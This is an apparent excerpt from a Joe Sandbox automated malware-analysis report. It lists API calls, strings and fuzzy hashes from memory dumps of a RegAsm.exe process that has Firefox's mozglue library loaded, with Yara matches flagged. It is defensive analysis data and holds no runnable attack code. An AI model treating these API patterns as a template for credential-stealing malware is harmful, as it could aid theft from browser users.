                                                                                    • Opcode Fuzzy Hash: e50acc06b729fa1e0b1f2cc62a80a174153e63e6c25daee0ddadc92d981462c8
                                                                                    • Instruction Fuzzy Hash: 28414771A056089FCB08DFB9E8A115FBBF9AF85748F11863EE845ABB41FB309805C741
                                                                                    APIs
                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CCA985D
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CCA987D
                                                                                    • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6CCA98DE
                                                                                    Strings
                                                                                    • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6CCA98D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                    • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                    • API String ID: 1778083764-3290996778
                                                                                    • Opcode ID: ea83a8ddd7f29d2339ae01e4f3e1613e2749a6116391e8ee59b03d2a37edb080
                                                                                    • Instruction ID: 006b3613d92437f6893f089e862bf9485d2b8e81337ec4b2c1f8080ea5bedf93
                                                                                    • Opcode Fuzzy Hash: ea83a8ddd7f29d2339ae01e4f3e1613e2749a6116391e8ee59b03d2a37edb080
                                                                                    • Instruction Fuzzy Hash: 2A313875B001086FDF04AF99D8545EF77B8DF89714F40442DEA0AABB40EB315905CBD1
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 6CC84721
                                                                                      • Part of subcall function 6CC34410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC73EBD,00000017,?,00000000,?,6CC73EBD,?,?,6CC342D2), ref: 6CC34444
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__stdio_common_vsprintf
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 680628322-2661126502
                                                                                    • Opcode ID: d1d6f89a7f23acc32b07ea59fd43b6308102e64b718f859a58da51ce8f91eece
                                                                                    • Instruction ID: 5e48483350d0f2db4af953b6ae2c810f674d78901716a2086dd20c3926066b26
                                                                                    • Opcode Fuzzy Hash: d1d6f89a7f23acc32b07ea59fd43b6308102e64b718f859a58da51ce8f91eece
                                                                                    • Instruction Fuzzy Hash: 8E310A71F052185BCB08CFADD8A569E7FE69B89318F15453EE8059BB41F7749804CB50
                                                                                    APIs
                                                                                      • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC8B127), ref: 6CC8B463
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8B4C9
                                                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC8B4E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _getpidstrlenstrncmptolower
                                                                                    • String ID: pid:
                                                                                    • API String ID: 1720406129-3403741246
                                                                                    • Opcode ID: 578de043bc189f953e9b011d4b93cfa6e2a7c9c8b97ac8c6192858bebd1afd38
                                                                                    • Instruction ID: 57451e8c32362852b8634e5dfd6271a92c7e209f7e3058e80370728dfe1efed8
                                                                                    • Opcode Fuzzy Hash: 578de043bc189f953e9b011d4b93cfa6e2a7c9c8b97ac8c6192858bebd1afd38
                                                                                    • Instruction Fuzzy Hash: 7231F231A026089BDB00DFA9DC91AAFBBB5FF8531CF540529D81167F41E732A849CBA1
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7E577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E584
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E5DE
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7E8A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                    • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                    • API String ID: 1483687287-53385798
                                                                                    • Opcode ID: f6009b2a5954c8774ac28983fc51b33b247420d649fbd0d0696e22931075282e
                                                                                    • Instruction ID: 577bab60484d38b7f04b2a318214369104046de84ddfa8fd9d6983a66c206d8f
                                                                                    • Opcode Fuzzy Hash: f6009b2a5954c8774ac28983fc51b33b247420d649fbd0d0696e22931075282e
                                                                                    • Instruction Fuzzy Hash: DD11A13AA04258DFCB109F98C488A5AFBB4FB89728F01051DF84557B50E774A805CFA9
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                    • wsprintfW.USER32 ref: 00410CCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocProcesswsprintf
                                                                                    • String ID: %hs
                                                                                    • API String ID: 659108358-2783943728
                                                                                    • Opcode ID: 395bc16f8c9bdbf634976d61b22cc7b4631a25c0f429dc799fa7ba852be267f4
                                                                                    • Instruction ID: e5429f43cd492c04fed31fa47646dc7a773dda998c79e506addb4a7470e9706e
                                                                                    • Opcode Fuzzy Hash: 395bc16f8c9bdbf634976d61b22cc7b4631a25c0f429dc799fa7ba852be267f4
                                                                                    • Instruction Fuzzy Hash: 01D0A73174022477C62027E4BD0FF667F1CEB05BA6F800031FB0DD6151C9A1441187EE
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80CD5
                                                                                      • Part of subcall function 6CC6F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC6F9A7
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80D40
                                                                                    • free.MOZGLUE ref: 6CC80DCB
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    • free.MOZGLUE ref: 6CC80DDD
                                                                                    • free.MOZGLUE ref: 6CC80DF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                    • String ID:
                                                                                    • API String ID: 4069420150-0
                                                                                    • Opcode ID: 52e6067700eda5f2aa6d35be30d7c2f8a70680f54f450037c0986779ab37e4d1
                                                                                    • Instruction ID: 1e4f297e14a28ca1f40f06ba4412f32bc7906c2847d014c800c1c5831b5ae8d6
                                                                                    • Opcode Fuzzy Hash: 52e6067700eda5f2aa6d35be30d7c2f8a70680f54f450037c0986779ab37e4d1
                                                                                    • Instruction Fuzzy Hash: A3411A71A0A7848BD320CF29C08079BFBE5BFC5758F518A2EE8D887751E770A445CB82
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70838
                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC7084C
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CC708AF
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6CC708BD
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC708D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$memset
                                                                                    • String ID:
                                                                                    • API String ID: 837921583-0
                                                                                    • Opcode ID: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                                    • Instruction ID: 39ae6008f9ed7643583171aabc7496a9dcfe919a6608b4cbc146cc0712fa0887
                                                                                    • Opcode Fuzzy Hash: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                                    • Instruction Fuzzy Hash: FB21D3307002498BDF148FA5D899BAA73B9FF44708F50056CE509E7B41EF36A404CBE4
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDA4
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                      • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D158
                                                                                      • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D177
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDC4
                                                                                      • Part of subcall function 6CC87480: ReleaseSRWLockExclusive.KERNEL32(?,6CC915FC,?,?,?,?,6CC915FC,?), ref: 6CC874EB
                                                                                    • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CECC
                                                                                      • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                                      • Part of subcall function 6CC7CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC8CEEA,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000), ref: 6CC7CB57
                                                                                      • Part of subcall function 6CC7CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC7CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC8CEEA,?,?), ref: 6CC7CBAF
                                                                                    • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D058
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                    • String ID:
                                                                                    • API String ID: 861561044-0
                                                                                    • Opcode ID: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                                    • Instruction ID: a4b3047f5ab0d4354d2a3f650595aede65e562d1021fb61ae604fd739148466b
                                                                                    • Opcode Fuzzy Hash: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                                    • Instruction Fuzzy Hash: 51D16071A05B469FD708CF28C480B9AFBF1BF89308F01876DD95987711EB71A9A5CB81
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CC417B2
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?), ref: 6CC418EE
                                                                                    • free.MOZGLUE(?), ref: 6CC41911
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC4194C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                    • String ID:
                                                                                    • API String ID: 3725304770-0
                                                                                    • Opcode ID: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                                    • Instruction ID: d1815c987ecd806101ffba3002799b50403689a775dde8e368535f40b8862961
                                                                                    • Opcode Fuzzy Hash: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                                    • Instruction Fuzzy Hash: B581B070A112159FCB08CF6CD8949AEBBB1FF89314F04C52CE895AB750E730E864CBA1
                                                                                    APIs
                                                                                    • GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • __aulldiv.LIBCMT ref: 6CC55DB4
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 557828605-0
                                                                                    • Opcode ID: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                                    • Instruction ID: ca4236de6147bb88d128acd82141a990248519c5041f7350cf996e8fa2e56c25
                                                                                    • Opcode Fuzzy Hash: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                                    • Instruction Fuzzy Hash: 2951907AE0011A8FCF08CFACC994AAEBBB1FF85304F19865DD811A7750D731A955CB94
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3CEBD
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC3CEF5
                                                                                    • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC3CF4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 438689982-4108050209
                                                                                    • Opcode ID: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                                    • Instruction ID: 8ac224a142176f0fe784745d2793a67879c34ea292a3693b6c4ec1a3e5824e3b
                                                                                    • Opcode Fuzzy Hash: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                                    • Instruction Fuzzy Hash: 90511575A002668FCB00CF19D890A9AB7B5FF99304F19869DD8595F391E731ED06CBE0
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC977FA
                                                                                    • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC97829
                                                                                      • Part of subcall function 6CC6CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CC331A7), ref: 6CC6CC45
                                                                                      • Part of subcall function 6CC6CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CC331A7), ref: 6CC6CC4E
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC9789F
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC978CF
                                                                                      • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                                      • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                                      • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                    • String ID:
                                                                                    • API String ID: 2525797420-0
                                                                                    • Opcode ID: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                                    • Instruction ID: 2dd5b361b5c0cff2c2a0cce4a73f8cb83eafe1ecb128bbca8c71ed04cbe70aca
                                                                                    • Opcode Fuzzy Hash: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                                    • Instruction Fuzzy Hash: 3A41AD71905B069FD300DF29D48056AFBF4FFCA254F204A2EE4A987740EB31D559CB92
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC782BC,?,?), ref: 6CC7649B
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC764A9
                                                                                      • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                                      • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7653F
                                                                                    • free.MOZGLUE(?), ref: 6CC7655A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3596744550-0
                                                                                    • Opcode ID: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                                    • Instruction ID: 49e8e67bf02723a6240f7e2105daf02e09c3a1f18c1526096c8c75df20cbd06a
                                                                                    • Opcode Fuzzy Hash: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                                    • Instruction Fuzzy Hash: A3316FB5A047059FD740CF24D884A9ABBF4FF89314F00842EF85A97751EB34E919CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 1158113254-0
